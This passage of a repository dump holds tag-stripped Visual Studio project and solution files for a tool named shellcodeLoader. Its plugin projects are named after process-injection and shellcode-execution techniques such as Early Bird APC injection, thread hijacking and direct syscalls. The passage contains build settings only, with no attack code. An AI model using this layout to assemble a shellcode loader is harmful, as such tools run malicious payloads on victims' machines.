29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
--------------------------------------------------------------------------------
/plug/TLS Callback Load/TLS Callback Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}
23 | Win32Proj
24 | TLSCallbackLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
--------------------------------------------------------------------------------
/plug/Dynamic Load plus/Dynamic Load plus.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {77301751-93B6-4748-87CE-BEABD468F549}
23 | Win32Proj
24 | DynamicLoadplus
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
--------------------------------------------------------------------------------
/plug/CreateThreatPoolWait Load/CreateThreatPoolWait Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}
23 | Win32Proj
24 | CreateThreatPoolWaitLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 | $(SolutionDir)$(Configuration)\DATA\32
75 | .DAT
76 |
77 |
78 | true
79 |
80 |
81 | false
82 | $(SolutionDir)$(Configuration)\DATA\32
83 | .DAT
84 |
85 |
86 | false
87 | $(SolutionDir)\$(Configuration)\DATA\64
88 | .DAT
89 |
90 |
91 |
92 |
93 |
94 | Level3
95 | Disabled
96 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
97 |
98 |
99 | Windows
100 | true
101 |
102 |
103 |
104 |
105 |
106 |
107 | Level3
108 | Disabled
109 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
110 |
111 |
112 | Windows
113 | true
114 |
115 |
116 |
117 |
118 | Level3
119 |
120 |
121 | MaxSpeed
122 | true
123 | true
124 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
125 | MultiThreaded
126 |
127 |
128 | Windows
129 | true
130 | true
131 | false
132 |
133 |
134 |
135 |
136 | Level3
137 |
138 |
139 | MaxSpeed
140 | true
141 | true
142 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
143 | MultiThreaded
144 |
145 |
146 | Windows
147 | true
148 | true
149 | false
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}
23 | shellcodeLoader
24 | 8.1
25 | MFCProj
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 | Static
34 |
35 |
36 | Application
37 | false
38 | v140
39 | true
40 | Unicode
41 | Static
42 |
43 |
44 | Application
45 | true
46 | v140
47 | Unicode
48 | Static
49 |
50 |
51 | Application
52 | false
53 | v140
54 | true
55 | Unicode
56 | Static
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 | true
78 |
79 |
80 | true
81 | $(SolutionDir)$(Platform)\$(Configuration)\
82 |
83 |
84 | false
85 |
86 |
87 | false
88 |
89 |
90 |
91 | Use
92 | Level3
93 | Disabled
94 | WIN32;_WINDOWS;_DEBUG;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 |
99 |
100 | false
101 | true
102 | _DEBUG;%(PreprocessorDefinitions)
103 |
104 |
105 | 0x0804
106 | _DEBUG;%(PreprocessorDefinitions)
107 | $(IntDir);%(AdditionalIncludeDirectories)
108 |
109 |
110 |
111 |
112 | Use
113 | Level3
114 | Disabled
115 | _WINDOWS;_DEBUG;%(PreprocessorDefinitions)
116 |
117 |
118 | Windows
119 |
120 |
121 | false
122 | true
123 | _DEBUG;%(PreprocessorDefinitions)
124 |
125 |
126 | 0x0804
127 | _DEBUG;%(PreprocessorDefinitions)
128 | $(IntDir);%(AdditionalIncludeDirectories)
129 |
130 |
131 |
132 |
133 | Level3
134 | Use
135 | MaxSpeed
136 | true
137 | true
138 | WIN32;_WINDOWS;NDEBUG;%(PreprocessorDefinitions)
139 |
140 |
141 | Windows
142 | true
143 | true
144 | false
145 |
146 |
147 | false
148 | true
149 | NDEBUG;%(PreprocessorDefinitions)
150 |
151 |
152 | 0x0804
153 | NDEBUG;%(PreprocessorDefinitions)
154 | $(IntDir);%(AdditionalIncludeDirectories)
155 |
156 |
157 |
158 |
159 | Level3
160 | Use
161 | MaxSpeed
162 | true
163 | true
164 | _WINDOWS;NDEBUG;%(PreprocessorDefinitions)
165 |
166 |
167 | Windows
168 | true
169 | true
170 |
171 |
172 | false
173 | true
174 | NDEBUG;%(PreprocessorDefinitions)
175 |
176 |
177 | 0x0804
178 | NDEBUG;%(PreprocessorDefinitions)
179 | $(IntDir);%(AdditionalIncludeDirectories)
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 | Create
197 | Create
198 | Create
199 | Create
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
--------------------------------------------------------------------------------
/shellcodeLoader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "shellcodeLoader", "shellcodeLoader\shellcodeLoader.vcxproj", "{44ED408B-59F3-4A73-BEF3-AD7F274AEC54}"
7 | EndProject
8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Generator", "Generator", "{A627454C-01C6-4811-871A-28194598E2C9}"
9 | EndProject
10 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Loader", "Loader", "{714E11DF-8A6C-408B-95BD-D63BA510488E}"
11 | ProjectSection(SolutionItems) = preProject
12 | plug\public.hpp = plug\public.hpp
13 | EndProjectSection
14 | EndProject
15 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Direct", "Direct", "{7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}"
16 | EndProject
17 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Inject", "Inject", "{CA099911-8087-4632-96A5-A85511712F38}"
18 | EndProject
19 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CreateThreatPoolWait Load", "plug\CreateThreatPoolWait Load\CreateThreatPoolWait Load.vcxproj", "{E4458817-99D0-4463-AC97-A91E1F9FB3E1}"
20 | EndProject
21 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Fiber Load", "plug\Fiber Load\Fiber Load.vcxproj", "{A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}"
22 | EndProject
23 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtTestAlert Load", "plug\NtTestAlert Load\NtTestAlert Load.vcxproj", "{0E01D108-8DD7-4164-BABD-5257095F0CAF}"
24 | EndProject
25 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SEH Except Load", "plug\SEH Except Load\SEH Except Load.vcxproj", "{8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}"
26 | EndProject
27 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TLS Callback Load", "plug\TLS Callback Load\TLS Callback Load.vcxproj", "{E804DA50-1B3D-40A8-9FA5-D0A2B427C727}"
28 | EndProject
29 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dynamic Load", "plug\Dynamic Load\Dynamic Load.vcxproj", "{E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}"
30 | EndProject
31 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dynamic Load plus", "plug\Dynamic Load plus\Dynamic Load plus.vcxproj", "{77301751-93B6-4748-87CE-BEABD468F549}"
32 | EndProject
33 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Direct Load", "plug\Direct Load\Direct Load.vcxproj", "{95367D52-E3A0-46BF-BCAA-AAC13EAF244D}"
34 | EndProject
35 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtCreateSection-Inject Load", "plug\NtCreateSection-Inject Load\NtCreateSection-Inject Load.vcxproj", "{53C190DB-62BA-4D22-BEB9-BAC5F35D8893}"
36 | EndProject
37 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Syscall Load", "plug\Syscall Load\Syscall Load.vcxproj", "{7A811860-B9FC-4F64-BE80-DE0D30551A21}"
38 | EndProject
39 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "APC-Ijnect Load", "plug\APC-Ijnect Load\APC-Ijnect Load.vcxproj", "{85B4ED76-7171-4CDF-B909-654E77F54FA4}"
40 | EndProject
41 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Early Bird APC-Injetc Load", "plug\Early Bird APC-Injetc Load\Early Bird APC-Injetc Load.vcxproj", "{F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}"
42 | EndProject
43 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "OEP Hiijack-Inject Load", "plug\OEP Hiijack-Inject Load\OEP Hiijack-Inject Load.vcxproj", "{7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}"
44 | EndProject
45 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Thread Hiijack-Inject Load", "plug\Thread Hiijack-Inject Load\Thread Hiijack-Inject Load.vcxproj", "{9C8E8054-B951-44F4-9B6C-9021BE918EC8}"
46 | EndProject
47 | Global
48 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
49 | Debug|x64 = Debug|x64
50 | Debug|x86 = Debug|x86
51 | Release|x64 = Release|x64
52 | Release|x86 = Release|x86
53 | EndGlobalSection
54 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
55 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Debug|x64.ActiveCfg = Debug|x64
56 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Debug|x64.Build.0 = Debug|x64
57 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Debug|x86.ActiveCfg = Debug|Win32
58 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Debug|x86.Build.0 = Debug|Win32
59 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Release|x64.ActiveCfg = Release|x64
60 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Release|x64.Build.0 = Release|x64
61 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Release|x86.ActiveCfg = Release|Win32
62 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Release|x86.Build.0 = Release|Win32
63 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Debug|x64.ActiveCfg = Debug|x64
64 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Debug|x64.Build.0 = Debug|x64
65 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Debug|x86.ActiveCfg = Debug|Win32
66 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Debug|x86.Build.0 = Debug|Win32
67 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Release|x64.ActiveCfg = Release|x64
68 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Release|x64.Build.0 = Release|x64
69 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Release|x86.ActiveCfg = Release|Win32
70 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Release|x86.Build.0 = Release|Win32
71 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Debug|x64.ActiveCfg = Debug|x64
72 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Debug|x64.Build.0 = Debug|x64
73 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Debug|x86.ActiveCfg = Debug|Win32
74 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Debug|x86.Build.0 = Debug|Win32
75 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Release|x64.ActiveCfg = Release|x64
76 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Release|x64.Build.0 = Release|x64
77 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Release|x86.ActiveCfg = Release|Win32
78 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Release|x86.Build.0 = Release|Win32
79 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Debug|x64.ActiveCfg = Debug|x64
80 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Debug|x64.Build.0 = Debug|x64
81 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Debug|x86.ActiveCfg = Debug|Win32
82 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Debug|x86.Build.0 = Debug|Win32
83 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Release|x64.ActiveCfg = Release|x64
84 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Release|x64.Build.0 = Release|x64
85 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Release|x86.ActiveCfg = Release|Win32
86 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Release|x86.Build.0 = Release|Win32
87 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Debug|x64.ActiveCfg = Debug|x64
88 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Debug|x64.Build.0 = Debug|x64
89 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Debug|x86.ActiveCfg = Debug|Win32
90 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Debug|x86.Build.0 = Debug|Win32
91 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Release|x64.ActiveCfg = Release|x64
92 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Release|x64.Build.0 = Release|x64
93 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Release|x86.ActiveCfg = Release|Win32
94 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Release|x86.Build.0 = Release|Win32
95 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Debug|x64.ActiveCfg = Debug|x64
96 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Debug|x64.Build.0 = Debug|x64
97 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Debug|x86.ActiveCfg = Debug|Win32
98 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Debug|x86.Build.0 = Debug|Win32
99 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Release|x64.ActiveCfg = Release|x64
100 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Release|x64.Build.0 = Release|x64
101 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Release|x86.ActiveCfg = Release|Win32
102 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Release|x86.Build.0 = Release|Win32
103 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Debug|x64.ActiveCfg = Debug|x64
104 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Debug|x64.Build.0 = Debug|x64
105 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Debug|x86.ActiveCfg = Debug|Win32
106 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Debug|x86.Build.0 = Debug|Win32
107 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Release|x64.ActiveCfg = Release|x64
108 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Release|x64.Build.0 = Release|x64
109 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Release|x86.ActiveCfg = Release|Win32
110 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Release|x86.Build.0 = Release|Win32
111 | {77301751-93B6-4748-87CE-BEABD468F549}.Debug|x64.ActiveCfg = Debug|x64
112 | {77301751-93B6-4748-87CE-BEABD468F549}.Debug|x64.Build.0 = Debug|x64
113 | {77301751-93B6-4748-87CE-BEABD468F549}.Debug|x86.ActiveCfg = Debug|Win32
114 | {77301751-93B6-4748-87CE-BEABD468F549}.Debug|x86.Build.0 = Debug|Win32
115 | {77301751-93B6-4748-87CE-BEABD468F549}.Release|x64.ActiveCfg = Release|x64
116 | {77301751-93B6-4748-87CE-BEABD468F549}.Release|x64.Build.0 = Release|x64
117 | {77301751-93B6-4748-87CE-BEABD468F549}.Release|x86.ActiveCfg = Release|Win32
118 | {77301751-93B6-4748-87CE-BEABD468F549}.Release|x86.Build.0 = Release|Win32
119 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Debug|x64.ActiveCfg = Debug|x64
120 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Debug|x64.Build.0 = Debug|x64
121 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Debug|x86.ActiveCfg = Debug|Win32
122 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Debug|x86.Build.0 = Debug|Win32
123 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Release|x64.ActiveCfg = Release|x64
124 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Release|x64.Build.0 = Release|x64
125 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Release|x86.ActiveCfg = Release|Win32
126 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Release|x86.Build.0 = Release|Win32
127 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Debug|x64.ActiveCfg = Debug|x64
128 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Debug|x64.Build.0 = Debug|x64
129 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Debug|x86.ActiveCfg = Debug|Win32
130 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Debug|x86.Build.0 = Debug|Win32
131 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Release|x64.ActiveCfg = Release|x64
132 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Release|x64.Build.0 = Release|x64
133 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Release|x86.ActiveCfg = Release|Win32
134 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Release|x86.Build.0 = Release|Win32
135 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Debug|x64.ActiveCfg = Debug|x64
136 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Debug|x64.Build.0 = Debug|x64
137 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Debug|x86.ActiveCfg = Debug|Win32
138 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Debug|x86.Build.0 = Debug|Win32
139 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Release|x64.ActiveCfg = Release|x64
140 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Release|x64.Build.0 = Release|x64
141 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Release|x86.ActiveCfg = Release|Win32
142 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Release|x86.Build.0 = Release|Win32
143 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Debug|x64.ActiveCfg = Debug|x64
144 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Debug|x64.Build.0 = Debug|x64
145 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Debug|x86.ActiveCfg = Debug|Win32
146 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Debug|x86.Build.0 = Debug|Win32
147 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Release|x64.ActiveCfg = Release|x64
148 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Release|x64.Build.0 = Release|x64
149 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Release|x86.ActiveCfg = Release|Win32
150 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Release|x86.Build.0 = Release|Win32
151 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Debug|x64.ActiveCfg = Debug|x64
152 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Debug|x64.Build.0 = Debug|x64
153 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Debug|x86.ActiveCfg = Debug|Win32
154 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Debug|x86.Build.0 = Debug|Win32
155 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Release|x64.ActiveCfg = Release|x64
156 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Release|x64.Build.0 = Release|x64
157 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Release|x86.ActiveCfg = Release|Win32
158 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Release|x86.Build.0 = Release|Win32
159 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Debug|x64.ActiveCfg = Debug|x64
160 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Debug|x64.Build.0 = Debug|x64
161 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Debug|x86.ActiveCfg = Debug|Win32
162 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Debug|x86.Build.0 = Debug|Win32
163 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Release|x64.ActiveCfg = Release|x64
164 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Release|x64.Build.0 = Release|x64
165 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Release|x86.ActiveCfg = Release|Win32
166 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Release|x86.Build.0 = Release|Win32
167 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Debug|x64.ActiveCfg = Debug|x64
168 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Debug|x64.Build.0 = Debug|x64
169 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Debug|x86.ActiveCfg = Debug|Win32
170 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Debug|x86.Build.0 = Debug|Win32
171 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Release|x64.ActiveCfg = Release|x64
172 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Release|x64.Build.0 = Release|x64
173 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Release|x86.ActiveCfg = Release|Win32
174 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Release|x86.Build.0 = Release|Win32
175 | EndGlobalSection
176 | GlobalSection(SolutionProperties) = preSolution
177 | HideSolutionNode = FALSE
178 | EndGlobalSection
179 | GlobalSection(NestedProjects) = preSolution
180 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54} = {A627454C-01C6-4811-871A-28194598E2C9}
181 | {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C} = {714E11DF-8A6C-408B-95BD-D63BA510488E}
182 | {CA099911-8087-4632-96A5-A85511712F38} = {714E11DF-8A6C-408B-95BD-D63BA510488E}
183 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
